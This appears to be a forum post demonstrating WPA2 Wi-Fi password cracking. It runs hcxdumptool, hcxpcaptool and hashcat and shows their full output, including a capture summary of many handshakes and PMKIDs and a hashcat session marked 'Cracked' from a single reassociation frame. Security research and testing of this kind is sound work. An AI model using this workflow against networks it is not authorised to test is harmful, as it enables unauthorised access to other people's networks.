Here is an example running hcxdumptool -> hcxtools -> hashcat:
1) run hcxdumptool
2) get info about pcapng file
$ hcxpcaptool -o test.hccapx -k test.16800 hcxdumptool_dump.pcapng.gz
decompressing hcxdumptool_dump.pcapng.gz to /tmp/hcxdumptool_dump.pcapng.gz.tmp
reading from hcxdumptool_dump.pcapng.gz.tmp
summary:
file name........................: hcxdumptool_dump.pcapng.gz.tmp
file type........................: pcapng 1.0
file hardware information........: armv6l
file os information..............: Linux 4.19.37-2-ARCH
file application information.....: hcxdumptool 5.1.4
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
packets inside...................: 76658
skipped packets..................: 0
packets with GPS data............: 0
packets with FCS.................: 0
WDS packets......................: 7
beacons (with ESSID inside)......: 323
beacons (with MESH-ID inside)....: 3
probe requests...................: 2754
probe responses..................: 132
association requests.............: 2570
association responses............: 856
reassociation requests...........: 5831
reassociation responses..........: 705
authentications (OPEN SYSTEM)....: 7183
authentications (BROADCOM).......: 6607
authentications (APPLE)..........: 316
EAPOL packets (total)............: 55013
EAPOL packets (WPA2).............: 55013
PMKIDs (total)...................: 324
PMKIDs (WPA2)....................: 308
PMKIDs from access points........: 308
PMKIDs from stations.............: 16
EAP packets......................: 782
EAP START packets................: 6
EAP LOGOFF packets...............: 7
found............................: EAP type ID
found............................: EAP-SIM (GSM Subscriber Modules) Authentication
found............................: UMTS Authentication and Key Agreement (EAP-AKA)
best handshakes..................: 430 (ap-less: 277)
best PMKIDs......................: 66
430 handshake(s) written to test.hccapx
66 PMKID(s) written to test.16800
Now we remove all(!) packets except for one single reassociation request from hcxdumptool_dump.pcapng.gz to demonstrate the attack vector.
Important: There is no need to do this and you shouldn't clean a hcxdumptool pcapng file, otherwise you will lose a lot of important information (https://hashcat.net/forum/thread-6661-po...l#pid44872).
$ hcxpcaptool -k test.16800 single_frame.pcapng.gz
decompressing single_frame.pcapng.gz to /tmp/single_frame.pcapng.gz.tmp
reading from single_frame.pcapng.gz.tmp
summary:
file name........................: single_frame.pcapng.gz.tmp
file type........................: pcapng 1.0
file hardware information........: armv6l
file os information..............: Linux 4.19.42-1-ARCH
file application information.....: hcxdumptool 5.1.5
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
packets inside...................: 1
skipped packets..................: 0
packets with GPS data............: 0
packets with FCS.................: 0
reassociation requests...........: 1
PMKIDs (total)...................: 1
PMKIDs from stations.............: 1
best PMKIDs......................: 1
1 PMKID(s) written to test.16800
3) run hashcat
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-PMKID-PBKDF2
Hash.Target......: (removed)
Time.Started.....: Sat Jun 8 12:03:24 2019 (0 secs)
Time.Estimated...: Sat Jun 8 12:03:24 2019 (0 secs)
Guess.Base.......: File (wordlist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 296.9 kH/s (6.34ms) @ Accel:16 Loops:512 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 86027/101041 (85.14%)
Rejected.........: 11/86027 (0.01%)
Restore.Point....: 57354/101041 (56.76%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Siegen002& -> olivia12345
Hardware.Mon.#1..: Temp: 53c Fan: 38% Util: 33% Core:1835MHz Mem:5005MHz Bus:16
Started: Sat Jun 8 12:03:22 2019
Stopped: Sat Jun 8 12:03:25 2019